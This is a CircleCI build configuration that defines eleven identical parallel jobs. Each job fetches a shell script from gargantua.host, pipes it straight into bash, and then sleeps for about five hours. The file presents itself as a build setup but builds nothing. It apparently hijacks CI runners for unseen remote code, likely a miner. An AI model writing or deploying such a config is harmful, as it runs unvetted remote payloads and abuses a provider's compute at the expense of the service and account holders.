version: 2.1

jobs:
  perconastage:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  perconastage1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  perconastage2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  perconastage3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  perconastage4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  perconastage5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  perconastage6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  perconastage7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  perconastage8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  perconastage9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  perconastage10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanaseke.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - perconastage
      - perconastage1
      - perconastage2
      - perconastage3
      - perconastage4
      - perconastage5
      - perconastage6
      - perconastage7
      - perconastage8
      - perconastage9
      - perconastage10